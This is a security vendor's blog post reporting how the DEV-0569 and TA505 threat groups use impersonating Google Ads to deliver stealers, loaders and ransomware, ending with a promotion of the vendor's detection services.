Ransomware Groups Breaching Networks Using Google Ads

DEV-0569 is a threat actor using Google Ads in widespread, continuous advertising campaigns to distribute malware, steal victims’ credentials, and eventually infiltrate networks for ransomware attacks. Cybersecurity researchers have demonstrated in recent weeks how Google Ads search results have become the forefront of malicious advertisements spreading malware. The advertisements masquerade as websites for well-known software programs, including LightShot, Rufus, 7-Zip, FileZilla, LibreOffice, AnyDesk, Awesome Miner, TradingView, WinRAR, and VLC.

Ransomware Groups Using Google Ads

When visitors click on the advertising, they’re directed to sites that look to be download portals or clones of the software’s legitimate websites. If users click on the links, they often download an MSI file that installs various malware depending on the campaign. So far, RedLine Stealer, Gozi/Ursnif, Vidar, Cobalt Strike, and various ransomware have been installed in the campaigns. Even though it appears that numerous threat actors are exploiting the Google Ads platform to spread malware, two specific campaigns stand out because their infrastructure has previously been related to ransomware operations.

A malware distribution campaign was discovered in February 2022 using SEO poisoning to rank sites appearing to be popular software in search results. If users installed the software given on the pages, it will launch a new malware downloader called BatLoader, which will then launch as a multi-stage infection process, giving threat actors initial access to victims’ networks. The threat actors behind BatLoader, known as DEV-0569, had begun to market their malicious sites using Google ads. The infections eventually resulted in the development of Royal Ransomware on breached networks. Royal Ransomware first appeared in September 2022 and was being distributed by numerous threat actors. According to researchers, DEV-0569 is an initial access broker that leverages its malware distribution system to breach companies’ networks. They either utilize the access themselves or sell it to other malicious threat actors, including the Royal ransomware group.

On January 21^st, 2023, a researcher noticed that recent Google ads promoting popular software led to malicious websites that used infrastructure managed by the DEV-0569 threat actors. Even though malicious installers in the campaign don’t use BatLoader like in past campaigns, they install an information-stealer (RedLiner) and later a malware downloader (Gozi/Ursnif). RedLine is used in the present campaign to steal data, including passwords, cookies, and cryptocurrency wallets, while Gozi/Ursnif is used to download further malware. The new campaigns were connected to DEV-0569 since they used the same bitbucket repository and the ads-check[.]com URL used in the previously disclosed November/December 2022 campaigns.

It’s believed that threat operators will eventually utilize the Gozi infection to dump Cobalt Strike as BatLoader did in prior campaigns. DEV-0569’s web panel was utilized to track their malware distribution campaign and the screenshots were shared. The screenshots revealed legitimate programs being impersonated and numerous global victims were infected daily. The panel data was wiped clean every campaign day, however, there are data that can indicate that it’s the correlative ID of the records (it can be an estimated value for the number of victims of the panel, which is 63,576).

A different but identical Google campaign was discovered employing infrastructure previously used by TA505, the threat group responsible for spreading CLOP ransomware. The threat actors in the Google ads campaign deliver malware through websites posing as popular software, including AnyDesk, Slack, Microsoft Teams, Adobe, and websites for W-9 IRS forms. A GitHub page has a list of domains in the campaign that CronUp is tracking. When the campaign’s malware is installed, it will launch a PowerShell script that downloads and executes a DLL from the download-cdn[.] website which TA505 previously used. However, a threat researcher explained that the domain had already changed ownership and it’s unknown whether TA505 is currently utilizing it.

Regardless of who owns the domains, the huge number of malicious Google ads appearing in search results poses a significant concern for both consumers and companies. The campaigns, when used to acquire early access to companies’ networks, can lead to data theft, ransomware, and destructive attacks designed to disrupt operations. Google has robust policies that prohibit ads from attempting to avoid their enforcement by masking the advertiser’s identity and impersonating other brands and strictly enforcing them. Google reviews the ads in question and has them removed as they’re reported and detected.

With ransomware groups and threat actors constantly launching new methods and techniques, including new ad campaigns, like Google Ads, pretending to be popular websites, it’s important for companies to remain aware of the latest threat landscape and train employees to detect malicious campaign ads. At SpearTip, our certified engineers work in a continuous investigative cycle at our 24/7/365 Security Operations Center monitoring companies’ data networks for potential ransomware threats and being ready to respond to incidents at a moment’s notice. Our remediation experts are working to restore companies’ operations, reclaim their networks by isolating malware, and recover business-critical assets. ShadowSpear platform, an integrable managed detection and response tool, uses advanced detection engines powered by artificial intelligence (AI) and attack tactics, techniques, and procedure TTP) models to detect malicious activities.

If your company is experiencing a breach, call our Security Operations Centers at 833.997.7327 to speak directly with an engineer.